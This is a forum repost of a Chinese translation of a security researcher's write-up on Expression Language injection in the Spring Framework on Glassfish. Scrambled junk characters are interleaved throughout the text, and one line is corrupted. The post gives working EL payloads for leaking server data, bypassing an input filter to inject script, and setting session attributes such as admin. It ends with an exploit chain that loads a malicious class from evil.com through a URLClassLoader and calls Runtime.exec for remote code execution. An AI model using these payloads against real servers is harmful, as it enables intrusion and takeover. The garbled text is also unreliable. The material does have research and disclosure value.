Remote Code with( O" C o% L4 v, E
Expression Language Injection
0 R1 D* v: ^5 C1 a; @Spring Framework脆弱性—DanAmodio3 [! _9 P9 _6 R/ C, [) r, D
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
; D! }- C9 e& F5 `4 o. {可能会存在风险。6 f$ s1 I% q+ ?, a
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的. V& g$ f' |& {8 H
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
9 f; u3 N2 C8 ~; J3 p' ` L以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,- \; U3 ~2 s: l! Z! C% r* o
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前2 z' Z0 p3 |, B/ G% b
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
7 ~/ i0 M" ]: e9 k; g0 L( |由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
8 @* g# g! `2 B我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
* y7 d9 G+ X( ~( M% t* M本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。5 \2 V/ ~' W8 b2 Z% X4 c; m
这些版本不支持禁用double EL resolution.# Q9 ~- y2 |& A! e# ^
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
" R& A1 y) ^) s6 {. {1 m8 XEL2.2容器上可能进行远程代码执行。
0 L' ~9 Y2 q5 x- y7 L这是一个原始信息泄露的攻击例子:
0 n, F- L( \8 ^- a' O1 z2 h' P8 k请求:
9 w: s" |* x6 m1 e d- g" \ttp://vulnerable.com/foo?message=${applicationScope}
; ]; j# r, o5 k到达以下内容页面:
4 M8 T; B% ^9 X; S# ^% l, j结果将输出一些包含内部服务器信息calsspath 和本地工作目录
3 d# ~5 o1 `6 Q: d g你也可以做一些其他事情,如这样:( {# C6 s& G/ l# R5 W6 B, W4 S# Y
${9999+1}
5 \$ K+ ?: P0 I6 M, ]还可以访问session 对象和beans8 b2 m9 c$ A5 a: V# P9 m
${employee.lastName}0 d; A) P/ _9 C$ r5 H+ S9 v5 B. B# M$ B
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是0 \, w! e0 _7 j- v3 w+ a
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
" P! D& _' a" H$ V3 k西,比如XSS.' V. ]4 q1 l+ h4 q) J8 M- B
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签. q2 d; G" n! ?# D4 q& e
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤, [& x0 X( B F& W' ?! [0 m
呢?”, d( \8 F/ Y2 p' S
因此,我尝试巳缦拢�: ?6 M. a) M. ^$ V: h/ h
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP% S; b$ |; S5 o8 v" o
P
' N4 ]' Y0 S) a4 ~- t* R我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返, f7 q. ~9 Q8 l: w- ]
回的文本被插入进了spring:message 标签。
3 w' r; ]% y* R这里是一个最终绕过过滤的实例:3 d! f2 \+ b0 c
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ
6 Y! Q7 o$ a8 Y: v+ L# q它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为; }7 d0 m+ d5 a% W; L+ s( b n
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
2 J4 ]/ i6 ~4 g/ h( F- L4 i( ?( C* x6 _1 c经过一番研究,我学习到EL2.2 增加了方法调用。! y. Q' x) ?% v: T+ {0 n
我写了一个快速测试应用程序代码并且检测一些功能
/ d3 f, v6 j& w) o${pageContext.request.getSession().setAttribute(“account”,”123456″)}+ U$ A4 z( l. R, s w" R
${pageContext.request.getSession().setAttribute(“admin”,true)}0 [# ^4 D5 \* N& \0 m, u% ^3 I
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的: _$ l. Y: V, M7 s
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?2 J2 H, t- h: j% b1 S& h
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
+ Y, H: W: A+ @“, 1234)}
4 d0 F0 ] L8 R! c( z${“”.getClass().forName(“java.lang.Runtime”)}
# ~0 C9 J' F" F+ e3 _% U) V( L3 @3 `! T哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不% f2 I; e# K1 A- s
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函. ?. q( x4 a% f2 O- c
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有2 ~. ~* r: ~; v$ k/ n, p, ~0 l
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
1 D' ^& N( p0 V2 b) a% e1 m2 t; b' e方法签名invoke(Object obj, Object„ args)
5 x$ j4 p: l5 I; H8 h9 C$ b! _9 rJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问$ T, l3 B; z# Y9 k" [9 H
题,以让它可以工作起来。1 y; y( [# L" I# ? n" y
漏洞利用:
( a" x' R# A# m# t: u" L! W我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我. m6 a: }: g5 D2 |2 h
希望你们中的一些JAVA奇才告诉我我是如此的可笑。1 m5 H4 P6 }: A* P$ y% S
这里有一些我试过的失败的用例,为了试图让它工作的用例:0 Q9 _* Q* Q# Y( [
写文件到文件系统
9 p$ l8 O/ B% h0 ~# r9 P( U" G 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.: f* M% l3 m1 B3 {, y5 N% I
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
. f+ z( q$ S1 r$ _2 \ z6 }6 N2 r${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
/ o% f( ~& T; i; w# ]: ] Bjavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:+ n5 _% N+ e1 X' `/ l
org.springframework.expression.spel.standard.SpelExpressionParser not found0 v# V$ ~% U. r; u7 j, n+ q
by2 b( D" O# _. s; z: X u- ?! [
org.glassfish.web.javax.servlet.jsp [194].
A! a& Q% g- |+ d+ _3 i 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
. z- R# Y( l$ c 利用反射来创建一个新的Runtime(and watch the world burn)/ M& b4 Y. O" a$ E; q3 h K& B$ f/ F6 q) z
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName" H4 N2 M# e, W7 t6 K& u, \
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
0 l- k1 i5 d* ~# {% G/ O4 H${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
6 y) E6 p4 K7 f' R( B6 b' y9 t6 D 使用java.lang.ProcessBuilder2 t: N4 A) b+ r" \' H' P
用表达式语言来评估表达式语言4 |) n- I% W$ {' q/ u
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.; S& b; \+ u# I7 l! Q7 p
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
3 j& I- t- \& O2 i4 k0 F. B“,”".getClass(),null)} d; ]) T# x4 n! l
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)1 d9 C5 o/ ~. r! a5 H, w: Q
我在使用一个空数组通过Method.invoke()时失败了很多次
# D1 A8 o7 h$ q9 K“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
' u" Z1 |' |& D2 s# a6 Z.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A+ R/ g( b, l% p8 I& g2 V
rrayList”).newInstance().toArray())
; m: u+ {0 U& {java.lang.IllegalArgumentException: wrong number of arguments
, Z4 a! r, g+ Y9 P" C; y3 `最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可" ^% O9 N7 I0 g( ?
以创建一个恶意class文件并且指向类装载器.
& T. |& t+ u* ~" Z2 b我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:: j; A3 r6 ]" ~$ w2 v
public class Malicious {- x: k" w S; Z$ p, T
public Malicious() {4 s& p% z6 E! D% s) e
try {4 f% J# G% `/ Q7 `4 w: f7 v- {
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
( x: Z$ t8 ~' T" C5 Ajava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win" |4 X7 p! u3 T0 l1 q( m! U4 n
} catch (Exception e) {
5 Y) m6 {& M! r/ I* P0 ~3 A}- n( i) l: e' F4 ?3 A, e
}- z% K; l( Y( ^& e" }! E
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
/ C6 |8 b; c e/ q( e话中,因此它可以被使用.4 a* \& V9 Z, M
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName; h3 I# A0 g* ]7 {( i
(“java.util.ArrayList”).newInstance())}
+ n3 S% y, {, n( `URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
0 ~; d9 Y2 S8 j( H; n- n一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和; w2 A$ {+ v% s5 N9 x: @6 Q |) G9 Z
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个- k1 E& o0 E( A3 U) l
我们可以调用的create(string)方法,然后转换对一个URL对象。
( m# i9 ]4 E4 I2 ^0 d9 K1 w% z${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh' u& k! s& j; ^6 [
ere/malicious/classfile/is/located/”).toURL())}
" p7 y2 |6 V' u: M% D- q然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,1 N3 A6 P& u: r- u
恶意类文件被装载并创建,触发远程代码.
, a& O: Y6 D N${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte: Y% X2 ]. Z! @7 P
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
9 q2 `. ^/ {# _/ T7 _getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance5 q5 s% F+ T& A* Z& C
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对